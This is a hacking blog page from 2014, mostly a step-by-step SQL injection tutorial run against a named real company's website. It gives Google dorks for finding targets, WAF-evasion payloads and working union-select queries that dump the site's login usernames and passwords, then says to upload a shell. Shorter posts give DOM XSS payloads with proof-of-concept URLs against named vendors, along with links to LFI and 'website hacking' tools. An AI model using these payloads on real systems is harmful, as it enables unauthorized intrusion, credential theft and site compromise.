WELCOME TO "Pak SOftwares Spot" !

Learn Hacking , FB Hacking , New Hacking Tricks , And Full Web Hacking Only With Pak Softwares Spot

--------------------------------------------------------------------------

Wednesday, 16 July 2014

0 SQL Injection Explanied With Images



we see how we create databases,tables,columns, and add record in it in different ways and now
in this article , we will be covering on SQL injections ... how we can hack using sql injection

please rep+ if you like it .. it took my 1 hour to complete
what is sql injection???

SQL injection is a very common method of hacking websies in this era..
well, sql injection is a big thing, newbies think that this is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it can took many books to complete
So what you can DO with SQL injection
You can access records,
you can modify records
you can bypass Login areas
You can breach sql server

okay here our first step begins

Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

etc there is a huge list of dorks

now if you search anyone of these.. you will find many websites,,, open any of them
and you will see url like


Code:
website.com/index.php?id=1
this could be random
okay to test that if site is vulnerable, just put a ' at the end of url
and make it look like

Code:
website.com/index.php?id=1'

and if you see some error like

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any mysql error... etc or if you see any content of page missing
then the site is vulnerable

example

[Image: lgtf2af.png]

you see its mysql error..so the website is vulnerable Smile

So now lets move to next step

EXPLOITING the vulnerablity

now so we have find vuln website..its time to fetching secret data Big Grin

so what is our next step Smile to find the number of columns in the table

for that we replace ' with order by statment

like
Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

we need to increase the order by number till we get some error like
unknown column numbers or we found some content missing in the page

example
Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE

SO NOW WE SEE THAT WE GOT ERROR AT ORDER BY 21 , BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS Wink

some times this thing never works, we dont get error even at order by 1000
in that case we put ' at the end of id / parameter and put + at the end
like
Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error

now next step begins Big Grin

Union Select

NOW, we know we have 20 columns, now its time to select all the columns using union select
select statment is use to view data , if you want to learn more about sql, you can check my
article on working with SQL..
oka for now

we use statment like

Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

now you will see any DIGIT of columns on page
like 1 5 7 or anyone
if you dont see, place - before parameter value
example

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

you can see in below picture

you can see 3 and 4 on the web page .. these two are string columns..
we can retrieve our data in these columns

sometimes union select dont work due to WAF (web app firewall) ,, we add comments in our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3—

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—

or change case

/*!UnIOn*//*!SeLect*/+1,2,3—


etc



[Image: oksohyM.png]


now its time to retrive data in these columns

we can retrive sensitive data .. we can call functions for database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE etc and many more

oka for the tutorial, i will call version function in column 3 and db and user info in
column 4 using group_concat()...

for that i will use
Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,1 ​6,17,18,19,20--

I used 0x3a beacause its a hex value of SEMICOLON ( ; ) AND it will seprate two different values of different parameters

now u can see in the image the column 3 and 4 are now replace with values that I called

[Image: mYXScSV.png]

okay .. next thing

how to find all databases in the website ??

okay thats easy

now we need to replace column name with
query like this

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--


see

[Image: lgt73e3.png]

now we know there are basicaly two databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system tables which define
databases.. we can use these tables to look at the database layout style


okay now we have our database ( we dont need to check, we can use its value actually, if we are trying to dump in current database,,, we can use
its function too.. database() instead of cementco_cement.. its needed when we are dumping in outside of current database
but in this case we will be simple dumping)

okay let now lets find the tables in current db

we will use WHERE , condtion in this query now

we will fetch tables with select statement and use where condtion to determine which database tables we want to fetch

okay
syntax

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

[Image: lgt97a9.png]

now you can see we have all table names Smile
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint, ​ tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat ​ ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t ​bl_tnc,tender,tender2,tender3,tender_drawing,unit

now we gonna dump in sensitive table
which is login

okay... lets dump it

now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns
and in where condtion we will change table_schema with table_name
and will give parameter of table_name = name of table in qoute like
table_name='login'
why used qoute? because its datatype is varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for that i use hack bar Big Grin

so now our query looks like

mysql char value of login is CHAR(108, 111, 103, 105, 110)

exmaple

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

yeahhhh..now we can see columns of table 'login'
which are ...id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

okayy...now the fun begins... time to dump the columns...
for example if we need to dump username and password columns from table 'login' we will replace the query with

select group_concat(username,0x3a,password) from login--
dumped

syntax
Code:
http://www.cementcorporation.co.in/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,​19,20 from login--
[Image: sE3M29s.png]

you can see username:password in the webpage Big Grin

now just find admin panel and upload the shell Big Grin

it was easy?? yeah.. but sometime waf can fuff your mind Big Grin

now .. dealing with error based sql injections

well i have already posted this tutorial here

http://www.madleets.com/Thread-double-qu...tion-video


0 DOM XSS TUT BY DARKSNIPPER


what is Dom

DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.
Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Example


PHP Code:
html>
 < 
head>
< /
head>
body
 
var 
pos=document.URL.indexOf(" madleetop =")+9;   //finds the position of value  var userInput=document.URL.substring(pos,document.URL.length);  //copy the value into userInput variable document.write(unescape(userInput));  //writes content to the webpage   < / body>< / html> 
i use spaces coz site is filterng my cntent nd remvng html tags.


In the above example, the javascript code getsvalue from the url parameter "madleetop" and writes the value in our webpage.

For Example If the Url is
Code:
www.madleets.com/snipper?madleetop=me
the webpage will display "me"

Did you notice ?! The part of the webpage is not written by Server-side script. The client side script modifies the content dynamically based on the input. Everything done with the help of DOM object 'document'.
Hope you understand.

DOM Based XSS vulnerability:

When a web developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code.
In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url.
An attacker with malicious intention can inject a xss vector instead .
For example:
Code:
www.madleets.com/snipper?madleetop= alert("iammad")< / script>
the document.write function simply writes the value of madleetop parameter in the webpage. So it will write the 'alert("immad")< /script>' in the webpage without sanitizing. This results in running the script code and displays the alert box.
More Information
we can inject other sites like
http://www.site.com/me.aspx
A user could inject code for example:

< img src=f00bar onerror=prompt(" xss");> ...on the input text in the form nd click oN"Search" button
example no 2
kaspersky was also vulnerable to it
let me explain how attacker did:
The problem was located on a bad validation of location.hash coming from jQuery (which is alsooutdated)
PHP Code:
/*load current tab by url*/

//if($.url.param("tab"))
$('a[name='+$.url.param("tab")+']').trigger('click');

var 
hash location.hash;

if (
hash.indexOf("tab=") != -1) {
hash hash.replace(/^#tab=/, "");
$('a[name=' hash ']').trigger('click');

If a user loads the "tab" parameter on the URL it will execute the code.
Proof of concept:
Code:
http://www.kaspersky.com/tablet-security #tab= < img src=x onerror=prompt( "xs s");>
Note:it has been patched
i used jus to make easy to explain.
Example no 3.
Avg was also Vulnerable to it,but they patched it.
Poc:
Due to the lack of escaping/encoding the URL onthe code present on file js_stdfull.js, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)

var pathname = $(location).attr('href');var urlparts = pathname.split("#");
Proof of concept:
Code:
http://www.avg.com/eu-en/download# " > < im g src=x onerror = prompt( / xss/ );
thanks.


0 Hack a Target Website With This Tool

Hi guys just wanna to share with you this cool script i made few time ago it's name is Targeting Guru

[Image: 2014-06-28_171146.png]

Link on sourceforge Here


0 Parrot Os for Hacking , Dowload + Video TUT


today i will give you one of the best operating system for the hackers
it will help you too much
it's upgraded version from Kali

Parrot 0.9

Photo
[Image: Schermata.png]
[Image: Parrot-forensics.png]
[Image: Schermata-22.png]

video
Video


Download
Download


Virus Scan
Virus scan


0 LFI scanner Online Working

Asalamu Alikum
After a short break m back wd an interesting  Web-Hacking
So today m gonna Show you How To Hack website Using Local File Inclusion

Local File Inclusion Vulnerability
What You Need
Mozila Firfox

Dorks: (If y0u wAnt mOre dork's use y0ur bRain And Make y0ur 0wn Dork's Tongue )
Tool 
http://www.morimac.com/ficheiros/news/lfi.php


0 WSPLOIT v1.3 Download

 

it's a simple tool that i coded .. i had fun

[Image: Screenshot%20from%202014-07-13%2013:09:10.png]
Downlaod on sourceforge
https://sourceforge.net/projects/wsploit/


0 Hack Facebook Via DNS Spoofing (Easy and Best Way)

Video TUT

By MadCode


  • Home
  • About Me
  • Contact us
  • Guest Post
  • Privacy Policy
  • Back To Top